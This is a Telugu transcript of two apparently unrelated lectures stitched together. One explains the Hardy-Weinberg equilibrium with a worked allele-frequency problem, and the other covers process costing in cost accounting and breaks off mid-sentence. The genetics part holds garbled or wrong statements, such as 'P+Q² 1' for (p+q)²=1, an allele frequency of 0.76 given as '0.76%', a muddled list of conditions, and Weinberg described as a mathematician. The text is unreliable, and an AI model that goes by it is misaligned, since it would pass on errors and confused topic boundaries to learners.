హార్డీ-వెయిన్బెర్గ్ సూత్రం అనేది వివరిస్తుంది. సో హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి ప్రకారం కొన్ని నిర్దిష్ట పరిస్థితులలో, ఇది మోస్ట్ ఇంపార్టెంట్, కొన్ని నిర్దిష్ట పరిస్థితులలో, ఆ పరిస్థితులు ఏంటో తర్వాత చూస్తాం, ఒక జనాభాలోని బహిర్గత మరియు అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు ఒక తరం నుండి మరొక తరానికి స్థిరంగా ఉంటాయి. సో మనం మెండల్ సూత్రాలు తీసుకున్నప్పుడు మెండల్ సూత్రాలలో మెండల్ చెప్పినటువంటి మొదటి సూత్రం బహిర్గతత్వ సూత్రం. ఈ బహిర్గతత్వ సూత్రం ప్రకారం ఏం చెప్పారు, ఒక జనాభా తీసుకున్నప్పుడు జనాభాలో రెండు ప్రధానమైనటువంటి లక్షణాలు కనిపిస్తూ ఉంటాయి. సంకలన ప్రయోగం మనం జరిపినప్పుడు జనకతరంలో ఉన్నటువంటి లక్షణాలలో ఏ లక్షణమైతే మొదటి తరం F1 తరంలో కనిపిస్తుందో ఆ కనిపించినటువంటి లక్షణాన్ని బహిర్గత లక్షణం అన్నాం. కనిపించకుండా F2 తరంలో కనిపించేటటువంటి లక్షణం ఏదైతే ఉందో ఆ లక్షణాన్ని అంతర్గత లక్షణం అంటాం. సో ప్రతి జనాభా తీసుకున్నప్పుడు ఈ రెండు లక్షణాలు మనకు కనిపిస్తూ ఉంటాయి, ఒకటి బహిర్గత లక్షణం, రెండోది అంతర్గత లక్షణం. సో ఈ హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి లేదా హార్డీ-వెయిన్బెర్గ్ సూత్రం ఏమని వివరిస్తుంది, ఒక జనాభాలో ఉన్నటువంటి బహిర్గత మరియు అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు, ఫ్రీక్వెన్సీ అంటే ఎన్నిసార్లు బహిర్గత లక్షణం ప్రతిబింబించవచ్చు లేదా వ్యక్తీకరణ కావచ్చు, ఎన్నిసార్లు అంతర్గత లక్షణానికి సంబంధించి వ్యక్తీకరణ, ఆ జన్యు వ్యక్తీకరణ కావచ్చు అనేది విశ్లేషిస్తుంది ఈ హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి.
ఆయన ఏం చెప్తాడంటే ఈ హార్డీ వీన్బెర్గ్ సూత్రం ప్రకారం ఈ అంతర్గత మరియు బహిర్గత జన్యు పౌనఃపున్యాలు ఒక తరం నుంచి మరొక తరానికి ఎల్లప్పుడూ స్థిరంగా ఉంటాయి అని ఈ హార్డీ వీన్బెర్గ్ సూత్రం యొక్క ప్రతిపాదన. ఎలా ఉంటుందో ఏంటో చూద్దాం. సో మనం నిర్దిష్ట పరిస్థితులు అని చెప్పాం. ఆ పరిస్థితులు తీసుకుంటే కనుక మొదటిది అతి పెద్ద జనాభా ఉండాలి. రెండవ అంశం జనాభాలోని జీవుల మధ్య స్వేచ్ఛగా సంపర్కం జరగడం. 3 ఉత్పరివర్తనాలలో రేటులో మార్పు లేకపోవడం, అంటే మ్యుటేషన్స్ అనేవి జరగకూడదు. తర్వాత వర్ణం లేకుండా అన్ని జన్యు రూపాలు సమానంగా ఫలవంతమైనవి కావడం. సో ఏదైతే ప్రత్యుత్పత్తి పరంగా తీసుకున్నప్పుడు పరంగా అన్ని జీవులు కూడా ఫలవంతమైనటువంటి జీవులు ఉత్పత్తి కావాలి. తర్వాత తరాల మధ్య అంతరంలో తేడా లేకపోవడం, అంటే ఒక తరానికి మధ్య ఎక్కువ గ్యాప్, ఎక్కువ వ్యవధి అనేది లేకపోవడం అనేది ఇంకొక అంశం. ఇంకొక ప్రధానమైన అంశం చివరిది జనాభా నుండి వలసలు జరగకపోవడం. మరియు వలస అంటే జనాభాలో నుంచి కొంత జనాభా బయటికి పోకూడదు, అట్లాగే ఆ జనాభాలోకి కొత్త జనాభా వచ్చి చేరకూడదు. సో ఈ అంశాలు గనక ఫుల్ఫిల్ చేస్తే, ఈ అంశాలు గనక అక్కడ నిర్ధారణ జరిగితే అటువంటి జనాభాలో మనం హార్డీ వీన్బెర్గ్ సమతా స్థితిని చూడవచ్చు. మరి ప్రకృతి పరంగా సహజ జనాభా తీసుకున్నప్పుడు ఇవన్నీ సాధ్యం కానటువంటి అంశాలు. అందుకే మొదటే చెప్పాను మీకు, ప్రయోగశాలలో ప్రయోగపూర్వకంగా జన్యు పౌనఃపున్యాలు లెక్కించడానికి ఉపయోగించేటటువంటి ఒక సమతా స్థితి అని చెప్పాం. సో సాధారణంగా సహజ సిద్ధంగా మనం దీనిని నిరూపణ చేయలేం. నెక్స్ట్ చూడం. సో యుగ్మ వికల్పాల ఇక్కడ 3 అంశాలని ఈ హార్డీ వీన్బెర్గ్ సమతా స్థితిలో చర్చించడం జరిగింది. మొదటిది యుగ్మ వికల్పాల పౌనఃపున్యంలో సమతా స్థితి. ఒక జనాభాలోని దైహిక క్రోమోజోముల యందరి లోకస్ల వద్ద ఉన్న యుగ్మ వికల్పాల పౌనఃపున్యం తరాలను బట్టి మారదు. బహిర్గత అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యం స్థిరంగా ఉంటుంది. సో మనకు క్రోమోజోములు తెలుసు. క్రోమోజోముల మీద లోకస్ అంటే ఏ స్థానం వద్ద అయితే జన్యువులు ఉంటాయో దాన్ని లోకస్ అంటాం. వీటి యొక్క పౌనఃపున్యం అంటే ఎన్నిసార్లు ఈ జన్యువు ఆ జనాభాలో ప్రతిబింబిస్తోంది అనేటటువంటి పరిగణలోకి తీసుకున్నప్పుడు అది ఎల్లప్పుడూ స్థిరంగానే ఉంటుంది. ఆ పౌనఃపున్యాల నిష్పత్తి ఏది అంతర్గత బహిర్గత లక్షణానికి సంబంధించి ఆ జన్యువులు ఏదైతే వ్యక్తీకరణ జరుగుతుందో ఆ వ్యక్తీకరణ యొక్క అంటే ఎన్నిసార్లు తరచుదనం అంటాం మనం, ఎన్నిసార్లు వస్తుంది, బహిర్గత లక్షణం ఎన్నిసార్లు వచ్చింది, అంతర్గత లక్షణం ఎన్నిసార్లు వచ్చింది అనేది మనం లెక్కిస్తే అది ఎల్లప్పుడూ స్థిరంగా ఉంటుందని చెప్తుంది మొదటి అంశం. రెండవ అంశం ఒక జనాభాలోని జన్యురూప పౌనఃపున్యాలు యుగ్మ వికల్పాల పౌనఃపున్యం మీద ఆధారపడి ఉంటాయి. సో ఇందాక మనం అంతర్గత లక్షణం ఎన్నిసార్లు వస్తుంది, బహిర్గత జన్యువు ఎన్నిసార్లు వ్యక్తీకరణ జరిగిందో వివరించాం. తర్వాత రెండో అంశం ఏం చెప్తాడంటే జన్యురూప పౌనఃపున్యాలు అంటే జన్యుపరంగా అది అంతర్గతమా బహిర్గతంగా, అంటే అది సమయుగ్మజమా విషమయుగ్మజమా అనే అంశం కూడా దీంట్లో వివరిస్తాం అనేది జరుగుతుంది. నెక్స్ట్ మూడో అంశం ఏ కారణం చేతనైనా యుగ్మ వికల్పాల పౌనఃపున్య సమతాస్థితి చెదిరిపోతే, అంటే ఒకవేళ పొరపాటున వాటి యొక్క ఈక్విలిబ్రియం కనుక చెదిరిపోతే మళ్ళీ ఏమవుతుంది, అదే జనాభాలో స్వేచ్ఛా సంగమం ద్వారా ఫ్రీ మేటింగ్ ద్వారా తిరిగి స్థాపించబడుతుంది. అంటే ఆ జనాభా అనే కూడా ఏం చేస్తుంది, అక్కడ స్పెషల్గా ప్రత్యేకంగా అభివృద్ధి చేసుకుంది. అంటే యుగ్మ వికల్పాల పౌనఃపున్యంలో మార్పు సంతరించిందనే జనాభాకు అర్థమైనప్పుడు, అంటే జనాభాలో బహిర్గత లక్షణాలు అంతర్గత లక్షణాల యొక్క సంఖ్య కానీ వాటి యొక్క వ్యక్తీకరణ యొక్క తరచుదనం కానీ ఏదైతే పౌనఃపున్యం ఉందో ఎన్నిసార్లు వస్తుందో తీసుకున్నప్పుడు అది మారినది అని అనుకున్నప్పుడు ఆ జనాభాలోనే స్వేచ్ఛా సంగమం అనేది జరిగి మళ్ళీ అది స్థిరీకరింపబడుతుందని వివరిస్తుంది. సో దీని గురించి చూద్దాం. ఒక జనాభాలోని బహిర్గత అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు పరిగణలోకి తీసుకుని హార్డీ మరియు వేన్బెర్గ్ అనే గణిత శాస్త్రవేత్తలు ఒక సమీకరణాన్ని, హార్డీ మరియు వేన్బెర్గ్ అనేటువంటి వాళ్ళు గణిత శాస్త్రవేత్తలు వాళ్ళు ఒక సమీకరణాన్ని, అది ద్విపద సిద్ధాంతం చూద్దాం ఇక్కడ. సో వాళ్ళు ప్రతిపాదించింది ఏంటంటే P+Q=1 ఎల్లప్పుడూ స్థిరంగా ఉంటుంది పౌనఃపున్యాలు అని చెప్పాం. అట్లాగే P+Q² 1 దాన్నే కనుక ద్విపద రూపంలో కనుక రాసుకుంటే A+B² రూపంలో P² + 2PQ+Q² 1. సో దీనిని వివరణాత్మకంగా తీసుకుంటే P అంటే ఏంటంటే బహిర్గత దృశ్యరూప లక్షణ పౌనఃపున్యం.
ఇందా చెప్పుకున్నాం మనం మెండల్ సూత్రాలను బట్టి బహిర్గత లక్షణం అంటే ఏంటి, ఏదైతే ఎఫ్ అంతరంలో వ్యక్తీకరణ జరుగుతుందో ఆ బహిర్గత లక్షణం అన్నాం. ఆ బహిర్గత దృశ్యరూప లక్షణ పౌనఃపున్యం పి. క్యూ అంటే ఏంటి, అంతర్గత దృశ్యరూప లక్షణం యొక్క పౌనఃపున్యం. అంటే అంతర్గత దృశ్యరూప లక్షణం, అంతర్గత లక్షణము ఎన్నిసార్లు వచ్చింది, పౌనఃపున్యం ఎన్నిసార్లు అక్కడ ప్రకటితమైంది, ఎన్నిసార్లు వ్యక్తీకరణ జరిగింది. అట్లాగే పీ స్క్వేర్. సో ఇందాక దృశ్య రూపానికి సంబంధించింది, స్క్వేర్ వచ్చేసరికి జన్యు రూపానికి సంబంధించింది. పీ స్క్వేర్ సమయుగ్మజ చూడండి అక్కడ. సో జన్యు రూపంలో రెండు యుగ్మ వికల్పాలు ఒకే రకంగా ఉన్నాయి కాబట్టి సమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం పీ స్క్వేర్. తర్వాత 2pq తీసుకోండి, విషమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం. దాని తర్వాత క్యూ స్క్వేర్ తీసుకోండి, సమయుగ్మజ అంతర్గత జన్యురూప పౌనఃపున్యం. సో ఈ మూడు కూడా జన్యురూపాల పౌనఃపున్యానికి సంబంధించింది. ఈ రెండు దృశ్యరూప పౌనఃపున్యానికి సంబంధించింది. అంటే రెండింటినీ వివరిస్తుంది. ఇప్పుడు మనం 3 మౌలిక అంశాలను చెప్పుకున్నాం ఇందాక. ఆర్డి వీన్బర్గ్ సమతాస్థితిలో 3 మౌలిక అంశాలను గురించి విశ్లేషణ చేయడం జరుగుతుందని చెప్పి. సో అందులో ఇక్కడ చూస్తే కనుక దృశ్యరూపం గురించి వివరిస్తుంది, అట్లాగే జన్యురూపాల గురించి, జన్యురూప యుగ్మ వికల్పాల పౌనఃపున్యాల గురించి వివరించడం అనేది జరుగుతుంది. ఏది చెప్పినా కానీ ఇవన్నీ కూడా ఎల్లప్పుడూ నిర్దిష్టంగా మార్పు లేకుండా ఉంటాయని వివరిస్తుంది. సో అంతకుముందు అందుకే రాసాం మనం P+Q అంటే దృశ్యరూప లక్షణాల పౌనఃపున్యం ఒకటే అయింది. అట్లాగే P+Q హోల్ స్క్వేర్ వేసాం అంటే P² + 2pq + Q². సో ఇవన్నీ కూడా కూడుకున్నా కానీ, అంటే జన్యురూప పౌనఃపున్యాల మొత్తం కూడా కూడుకున్నా కానీ అది కూడా స్థిరంగానే ఉంది. అది ఎలా సాధ్యపడుతుందో కూడా చూద్దాం ఇప్పుడు. సో దీన్ని తీసుకుంటే కనుక ఇప్పుడు మనం చెప్పాం P² అంటే సమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం ఇలా వచ్చింది. P² ఎందుకు వేసామంటే కారణం అది. సో ఇది దృష్టిరూపం, ఇది దృష్టిరూపం అయినప్పుడు ఈ రెండు కలిస్తే కనుక జన్యురూపం అవుతుంది. అట్లాగే ఇక్కడ ఇది విషమయుగ్మజం అనేది, ఇది సమయుగ్మజమైంది. సమయుగ్మజ జన్యురూపం లక్షణం మాత్రం అంతర్గత లక్షణం, ఇక్కడ బహిర్గత లక్షణం, ఇక్కడ బహిర్గత లక్షణం విషమయుగ్మజం అనమాట. సో ఆ కారణంగా దాన్ని ఉదాహరణగా మనం తీసుకోవడం జరిగింది. సో దీనికి సంబంధించి ఒక సమస్యని కనుక చేస్తే మీకు అర్థమవుతుంది. ఇక్కడ చూడండి, ఇక్కడ 200 జీవులు గల జనాభాలో సమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 114. సమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 114. అట్లాగే విషమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 76. అలాగే సమయుగ్మజ అంతర్గత లక్షణం గల జీవుల సంఖ్య 10. అయితే వాటి యొక్క జన్యు పౌనఃపున్యాలను లెక్కించండి. అంటే P కట్టాలి, Q కట్టాలి, P+Q = 1 నిరూపించాలి. అట్లాగే P² కట్టాలి, Q² కట్టాలి, P² + 2pq P² + Q² + 2pq = 1 అని కూడా నిరూపించాలి. ప్రయత్నం చేద్దాం. సో ఇది చెప్పుకున్నాం కదా, మెండల్ యొక్క ఏకసంకలన ప్రయోగం ప్రకారం ఎట్లా వచ్చిందంటే P² PQ Q² రావడానికి మెండల్ ఏకసంకలన ప్రయోగం కారణం. ఆ దృష్ట్యా అంటే ఏకసంకలన ప్రయోగంలో ఉన్నటువంటి సంభావ్యత ఏ రకంగా జన్యువులు కానీ కలుస్తున్నాయో తీసుకుని దాని ప్రకారం మనం ఈ లెక్కన చేయబోతున్నాం. సో మొదటగా మనం బహిర్గత యుగ్మ వికల్పం క్యాపిటల్ ఏ, ఇంతకు ముందు స్లైడ్లో చూస్తే కనుక ఇది బహిర్గతం అని తీసుకుంటే, సో బహిర్గత యుగ్మ వికల్పం ఏ, సో దానిని లెక్కిస్తున్నాం. బహిర్గత యుగ్మ వికల్పం ఏ దాని యొక్క పౌనఃపున్యం అంటే ఏ అనేటటువంటి యుగ్మ వికల్పం P సార్లు వస్తుంది అనుకుంటే కనుక దాన్ని ఎలా లెక్కిస్తాం. దానికి సూత్రం ఏంటంటే 2 బహిర్గత సమయుగ్మజ జీవుల సంఖ్య, ఇక్కడ లెక్కలో ఇచ్చాడు సమయుగ్మజ జీవుల సంఖ్య ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య బై 2 జనాభాలోని జీవుల సంఖ్య. సో దీన్ని కనుక మనం ఒక లెక్క ఇక్కడ తీసుకుంటే కనుక సో ఇక్కడ 2 బహిర్గత సమయుగ్మజ జీవుల సంఖ్య ఎంతండి 114 ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య 76 బై 2 జనాభాలోని జీవుల సంఖ్య, జనాభాలోని మొత్తం జీవుల సంఖ్య 200 ఇచ్చారండి. సో దీన్ని కనుక సూక్ష్మీకరిస్తే ఇక్కడ 228
ప్లస్ 76/400 వస్తుంది. సో దాన్ని సూక్ష్మీకరిస్తే కనుక 304/400. సో దీన్ని తీసుకుంటే డివైడ్ చేస్తే కనుక 0.76 వస్తుంది. సో మీరు కనుక ఇక్కడ తీసుకుంటే మనం ఏం కట్టాము ఇక్కడ పి అంటే బహిర్గత యుగ్మ వికల్పం ఏ యొక్క పౌనఃపున్య అంటే ఈ ఏ అనేటటువంటి యుగ్మ వికల్పం ఈ 200 కలిగినటువంటి జనాభాలో 0.76% వస్తూ ఉంది అని విశ్లేషణ చేశాం, లెక్కించాం. అట్లాగే తర్వాత స్లైడ్కి వెళ్దాం. నెక్స్ట్ చూద్దాం అంతర్గత యుగ్మ వికల్పం. ఇందాక మనం మెండల్ ప్రయోగంలో చూసాం కదా, క్యాపిటల్ ఏ స్మాల్ ఏ విషమయుగ్మజ లక్షణం అని, ఏ సమయుగ్మజ అంతర్గత లక్షణం. దాని పౌనఃపున్యం ఎట్లా చూద్దాం. 2 అంతర్గత సమయుగ్మజ జీవుల సంఖ్య ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య బై 2 జనాభాలోని జీవుల సంఖ్య. అంటే అంతర్గత యుగ్మ వికల్పం ఏ అనేది క్యూ సార్లు వస్తే క్యూ యొక్క విలువ ఎంత అనేది లెక్కిస్తాం మనం. సో 2 అంతర్గత సమయుగ్మజ జీవుల సంఖ్య ఇక్కడ ఇచ్చారండి. సమయుగ్మజ అంతర్గత లక్షణం గల జీవులు 10 ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య ఇందాకేసాం 76 బై 2 × 200. సో ఈజ్ ఈక్వల్ టు ఇది 20 ప్లస్ 76 బై 400 తీసుకుంటే కనుక 96/400 అవుతుంది. దీన్ని కనుక సూక్ష్మీకరిస్తే 0.24 వస్తుంది. సో మనకి పి ఇందాక వచ్చింది 0.76, క్యూ 0.24 వచ్చింది. సో ఈ హార్డీ వీన్బర్గ్ సూత్రం ప్రకారం ఈ పౌనఃపున్యాలు ఎల్లప్పుడూ స్థిరంగా ఉండాలి అని చెప్పాం. ఉన్నాయో లేదో తర్వాత స్లైడ్లో చూద్దాం మనం. ఇక్కడ గమనించండి ఒకసారి. సో ఇక్కడ చూడండి, ఇక్కడ ఇందాక మనం పి క్యాలిక్యులేట్ చేస్తే 0.76 వచ్చింది, క్యూ క్యాలిక్యులేట్ చేస్తే 0.24 వచ్చింది, పి ప్లస్ క్యూ కనుక వస్తే 1 వచ్చింది, p² + 2pq + q². అలా చేసినా కానీ మీకు ఎల్లప్పుడూ వచ్చింది. సో హార్డీ వీన్బర్గ్ సమతాస్థితి మనకి విశ్లేషించేది ఏంటంటే దృశ్యరూప సంబంధించి పౌనఃపున్యాలు కానీ జన్యురూప యుగ్మ వికల్పాల పౌనఃపున్యాలు కానీ ఒక జనాభాలో ఎల్లప్పుడూ కూడా స్థిరంగా ఉంటాయని హార్డీ వీన్బర్గ్ సమతాస్థితి అనేది దాని ద్వారా మనం విశ్లేషించి తెలుసుకోవచ్చు. సో ఈ పాఠ్యాంశం నుంచి హార్డీ వీన్బర్గ్ సమతాస్థితి గురించి వ్యాసం డైరెక్ట్గా ఎస్ఏ క్వశ్చన్ వస్తుంది. థ్యాంక్ యూ. వ్యూయర్స్, ఈరోజు మనం కాస్టింగ్ అంశానికి సంబంధించి ప్రాసెస్ కాస్టింగ్ అనేటటువంటి ఒక అంశం గురించి పూర్తిగా మనం తెలుసుకోబోతున్నాం. కాస్టింగ్లో అతి ముఖ్యమైనటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ప్రాసెస్ కాస్టింగ్ గురించి తెలుసుకునే ముందుగా కాస్టింగ్ యొక్క టోటల్ స్ట్రక్చర్ ఒకసారి మనం చూద్దాం. కాస్టింగ్ని టోటల్గా 3 భాగాలుగా విభజించడం జరిగింది. ఆ 3 భాగాలు ఏంటంటే కాస్ట్ అకౌంటింగ్ సిస్టమ్స్ అని, కాస్ట్ అకౌంటింగ్ మెథడ్స్ అని, కాస్ట్ అకౌంటింగ్ టెక్నిక్స్ అని ఇలా 3 భాగాలుగా విభజించడం జరిగింది. ఇలా విభజించినటువంటి ఈ 3 భాగాల్లో
ఈరోజు మనం తెలుసుకోబోయేటటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ఇది కాస్ట్ అకౌంటింగ్ మెథడ్స్లోకి వస్తుంది. ఈ అంశాల్లో అతి ముఖ్యమైనటువంటి అంశాలు ఏంటున్నాయి ఒకటి మనం చూసినట్లయితే, ముందుగా మనం ప్రాసెస్ కాస్టింగ్ ప్రాథమిక అంశాల గురించి చూద్దాం. ప్రాసెస్ కాస్టింగ్ ఏ పరిశ్రమల్లో అవలంబిస్తారు అన్నది కానీ ఒకసారి చూసినట్లయితే, అసలు ప్రాసెస్ కాస్టింగ్ అంటే ఏంటి ఒకసారి చూద్దాం. కొన్ని పరిశ్రమల్లో వస్తూత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ఒక్కొక్క దశను ఒక్కొక్క ప్రాసెస్ అంటాం. ఈ తరహా పరిశ్రమలను ప్రాసెస్ పరిశ్రమలు అంటారు. ఈ పరిశ్రమల్లో అనుసరించేటటువంటి కాస్టింగ్ను ప్రాసెస్ కాస్టింగ్ అంటాం. ఈ ప్రాసెస్ కాస్టింగ్ అనేటటువంటి పద్ధతిని మనం అవలంబించాలి అంటే ఖచ్చితంగా ఆ పరిశ్రమలోని వస్తూత్పత్తి అనేది దశల వారీగా జరుగుతూ ఉండాలి. అలా దశల వారీగా జరుగుతున్నటువంటి పరిశ్రమల్లోనే ఈ ప్రాసెస్ కాస్టింగ్ అనేది అమలు చేయడం జరుగుతూ ఉంటుంది. ఈ ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి ఏ పరిశ్రమలు ఉన్నాయి ఒకసారి మనం చూసినట్లయితే, ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమలు చూస్తే నూనె శుద్ధి కర్మాగారాలు, రసాయనిక పరిశ్రమలు, రంగుల పరిశ్రమలు, సిమెంట్ పరిశ్రమలు, పంచదార పరిశ్రమలు, కాగితపు పరిశ్రమలు, అలాగే సబ్బుల పరిశ్రమలు, బిస్కెట్ల పరిశ్రమలు, వస్త్ర పరిశ్రమలు, పాడి వస్తువుల పరిశ్రమలు, మాంసపు పరిశ్రమలు, కలప పరిశ్రమ, బంగారం పరిశ్రమ, ఔషధాల పరిశ్రమ. ఈ పరిశ్రమలు కానీ ఉత్పత్తి కానీ ఒకసారి మనం చూసినట్లయితే, ఈ పరిశ్రమల్లో తయారయ్యే ఉత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ప్రతి దశకు ఒక ప్రాసెస్ అంటారు. ఆ ప్రాసెస్కి ఒక ఖాతాని ఏర్పాటు చేయడం జరుగుతుంది. ఆ ప్రాసెస్కి అయ్యేటటువంటి వ్యయాన్ని ప్రత్యేకంగా లెక్కిస్తారు. ఈ పద్ధతినే ప్రాసెస్ కాస్టింగ్ అంటారు. ఈ ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమ యొక్క లక్షణాలు కానీ మీరు చూసినట్లయితే, ఈ పరిశ్రమలో ముఖ్యంగా ఉత్పత్తి ప్రక్రియ ఏ విధంగా ఉంటుంది అంటే అవిచ్ఛిన్నంగా కొనసాగుతుంది. అంటే దీని అర్థం ఏంటంటే, ఉత్పత్తి ఒకసారి ఒక ప్రక్రియలో స్టార్ట్ అయినప్పుడు చివరి దశ వరకు కంటిన్యూ అవ్వాలి తప్ప మధ్యలో బ్రేక్ అయ్యేటటువంటి అవకాశం ఉండదు. సో మొట్టమొదటి లక్షణం ఏంటంటే, ఈ పరిశ్రమలో ఉత్పత్తి ప్రక్రియ అవిచ్ఛిన్నంగా కొనసాగాలి. అలాగే రెండోది, ఫ్యాక్టరీ మొత్తాన్ని కొన్ని ప్రాసెస్లుగా విభజించడం జరుగుతూ ఉంటుంది. అలాగే వ్యయం లెక్కించేటప్పుడు ఒక్కొక్క ప్రాసెస్కి ఎంత వ్యయమైంది లెక్కిస్తారు. నాలుగో లక్షణం చూసినట్లయితే, ప్రాసెస్ మొత్తం వ్యయాన్ని లెక్కించిన తర్వాత ఆ ప్రాసెస్లో ఎంత ఉత్పత్తి అయింది కనుగొని, ఆ ఉత్పత్తి వచ్చిన తర్వాత యూనిట్ వ్యయము కనుగొనడం జరుగుతూ ఉంటుంది. ప్రాసెస్ మొత్తం వ్యయాన్ని ఆ ప్రాసెస్లో ఉత్పత్తి అయినటువంటి వస్తువుల సంఖ్యతో భాగిస్తే యూనిట్ వ్యయం అనేది ఈజీగా మనం లెక్కించవచ్చు. అదేవిధంగా ఒక ప్రాసెస్లో తయారైన సరుకు ఆ తర్వాత ప్రాసెస్కి ముడి సరుకు అవుతుంది. ప్రాసెస్ కాస్టింగ్లో ముఖ్యమైనటువంటి లక్షణం ఏంటంటే, ఒక ప్రాసెస్లో తయారైనటువంటి వస్తువు రెండో ప్రాసెస్కి ముడి సరుకుగా వెళ్ళడం జరుగుతుంది. చివరి ప్రాసెస్లో పూర్తిగా తయారైనటువంటి సరుకు మనకు బయటికి రావడం జరుగుతూ ఉంటుంది. ఇది అతి ముఖ్యమైనటువంటి లక్షణం. అలాగే ఆరో లక్షణంగానే మనం చూసినట్లయితే, ప్రతి ప్రాసెస్లోనూ ఉత్పత్తి అయిన వస్తువులు ఒకే రకంగా ఉంటాయి మరియు ప్రామాణికంగా ఉంటాయి. అంటే వివిధ దశలు ఉంటాయి అనుకున్నాం. ప్రతి దశలో తయారైన వస్తువు ఒకే విధంగాను అత్యంత ప్రామాణికంగాను ఉంటాయి. ఈ లక్షణాలు ప్రాసెస్ కాస్టింగ్కి ఉంటాయి. అలాగే ఈ ప్రాసెస్ కాస్టింగ్లో మనకి వచ్చేటటువంటి ప్రయోజనాలు ఒకసారి చూద్దాం. ఈ ప్రాసెస్ కాస్టింగ్లో ఏ ఏ ప్రయోజనాలు ఉన్నాయి? మొట్టమొదటి ప్రయోజనం ఏంటంటే, ప్రాసెస్ వ్యయాల్ని నిర్ణీత కాలానికి నిర్ణయించవచ్చు. ప్రాసెస్ వ్యయాలు ఖచ్చితంగా ఒక నిర్ణీత కాలానికి నిర్ణయించవచ్చు. దీనివల్ల అనేక ప్రయోజనాలు మనకి ఉన్నాయి. ఆ ప్రయోజనాలు ఒక్కొక్కటి మనం విశ్లేషిద్దాం. రెండవ ప్రయోజనం, ఉత్పత్తి వ్యయాలు నియంత్రణ చేయడం చాలా సులభం. ఉత్పత్తి వ్యయాలని నియంత్రణ చేయడం చాలా సులభం. ఎందుకంటే ఒక్కొక్క ప్రాసెస్లో అయినటువంటి వ్యయం ఎంత అయింది అన్నది మనకి ఈజీగా లెక్కగట్టగలం. ఏ ప్రాసెస్లో ఎంత వృధా అవుతుంది, ఏ ప్రాసెస్లో ఎంత నష్టం అవుతుంది మనకి తెలుస్తుంది. కాబట్టి ఆ ప్రాసెస్ మీద ప్రత్యేకమైనటువంటి శ్రద్ధ పెట్టి నియంత్రణ చేసి ఆ ప్రాసెస్లో అయ్యేటటువంటి మొత్తం వ్యయాన్ని మనం నియంత్రించేటటువంటి అవకాశం ఉంటుంది. అలాగే ఖర్చులు, వివిధ ప్రాసెస్ల మధ్య అయినటువంటి ఖర్చులు సులభంగా ప్రతి ప్రాసెస్కి కేటాయించడానికి వీలుగా ఉంటుంది.
సో కామన్గా అయిన ఖర్చులను కూడా ప్రతి ప్రాసెస్కి ఏ విధంగా పంచాలి అనేటటువంటి అవకాశం ఇందులో ప్రాసెస్ కాస్టింగ్లో మనకుంది. ఈ ప్రాసెస్ కాస్టింగ్లో అత్యంత ముఖ్యమైన ప్రయోజనం ఏంటి అంటే ధర కొటేషన్స్ సులభంగా ఇవ్వచ్చు. ఎవరైనా ఒక కస్టమర్ ఒక ఆర్డర్ పెడితే సో వాళ్ళకి ఆ వస్తువులు ఏ విధంగా మనం సప్లై చేయగలం, ఏ ధరకు మనం సప్లై చేయగలం, ఎంత ప్రామాణికమైన ధరకి మనం సప్లై చేయగలం, ఖచ్చితత్వంతో ఈ ధర కొటేషన్స్ ఇవ్వగలిగేటటువంటి అవకాశం ప్రాసెస్ కాస్టింగ్లో ఉంది. అయితే ప్రాసెస్ కాస్టింగ్లో కూడా కొన్ని రకాలైనటువంటి లోపాలు ఉన్నాయి. ఆ లోపాలు ఏంటి ఒకసారి మనం చూద్దాం. లోపాలు చూసినట్లయితే మొట్టమొదటి లోపం, ప్రాసెస్ కాస్టింగ్లో తక్కువ వస్తువులు ఉత్పత్తి చేస్తే పర్వాలా, అలా కాకుండా ప్రాసెస్ కాస్టింగ్లో తయారైనటువంటి వస్తువులు అధిక వస్తువులు కానీ తయారు చేస్తే వాటి వ్యయాలు కనుక్కోవడం కష్టతరం అవుతుంది. అసాధ్యమేమీ కాదు కానీ చాలా క్లిష్టతరమైనది అని మనం ఇక్కడ చెప్పుకోవచ్చు. కాబట్టి ప్రాసెస్ కాస్టింగ్లో మనం తక్కువ రకాల వస్తువులు తయారు చేసే పరిశ్రమలకి ప్రాసెస్ కాస్టింగ్ అప్లై చేసుకుంటే అత్యద్భుతమైనటువంటి ఫలితాలు వస్తాయి. అలాగే రెండో లోపం ఏంటంటే ఉమ్మడి వస్తువులు. ప్రాసెస్లో అన్ని ప్రాసెస్లకి సంబంధించిన కొన్ని కామన్ ఖర్చులు ఉమ్మడి వస్తువుల మధ్య పంపిణీ చేయడం ఆమోదయోగ్యమైన ప్రాతిపదిక లేదు. ఒక్కొక్క పరిశ్రమ ఒక్కొక్క ప్రాతిపదికని అవలంబించడం వలన ఒకే రకమైనటువంటి పరిశ్రమలో వివిధ రకాలైనటువంటి వ్యయాలు వచ్చేటటువంటి అవకాశం ఉంది. మూడోది, కొనసాగుతున్న పని విలువను లెక్కించడం చాలా కష్టం. ఇక్కడ కొనసాగుతున్న పని అంటే ఏంటంటే ముడి పదార్థాల దశ నుంచి పూర్తిగా తయారైన దశకు వెళ్ళేటప్పటికి మధ్యలో ఉండే దశ ఉంటుంది. ఆ దశని ఇది పూర్తిగా ముడి పదార్థాలు కావు, అలాగని పూర్తిగా తయారైన వస్తువు కాదు, మధ్యలో ఉండేటటువంటి ఈ దశని కొనసాగుతున్న పని అంటాం. ఈ 